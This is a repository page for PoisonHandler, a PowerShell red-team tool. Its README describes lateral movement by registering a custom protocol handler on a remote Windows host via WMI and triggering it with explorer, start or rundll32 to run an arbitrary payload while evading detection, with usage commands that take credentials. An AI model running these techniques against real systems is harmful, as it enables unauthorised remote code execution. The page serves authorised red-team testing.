PowerShell
Need help with PoisonHandler?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.
Mr-Un1k0d3r

Description

lateral movement techniques that can be used during red team exercises

228 Stars 42 Forks 17 Commits 0 Opened issues

Services available

Need anything else?

PoisonHandler

lateral movement techniques that can be used during red team exercises.

Execute-PoisonHandler.ps1

This technique is registering a protocol handler remotely and invoke it to execute arbitrary code on the remote host. The idea is to simply invoke

start handler://
to execute commands and evade detection.

This cmdlet create a protocol handler that will call your payload. Then execute it over

WMI
using
explorer.exe
.

the command that will be execute will look like the following one:

cmd.exe /c start ms-browser://

Where

ms-browser
is the custom handler you registered and will execute the payload you specified.

The default handler name is

ms-browser
but it can be set with the
-Handler
switch

The handler can also be executed through

rundll32
using the following command
rundll32 url.dll,FileProtocolHandler
Usage:

module-import .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" module-import .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Handler ms-handler-name module-import .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Username MrUn1k0d3r -Password Password module-import .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Username MrUn1k0d3r -Password Password -UseRunDLL32 True module-import .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Username MrUn1k0d3r -Password Password -RemoteCommand "custom command to run the handler"

The

-RemoteCommand
switch can be used to specify the remote command used. the handler name will be appended at the end automatically.

Command that can be used

  • rundll32 url.dll,FileProtocolHandler
  • rundll32 url.dll,OpenURL
  • explorer
  • start

To do

  • add more way to execute the protocol handler

Credit

Mr.Un1k0d3r RingZer0 Team

Tazz0 RingZer0 Team

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.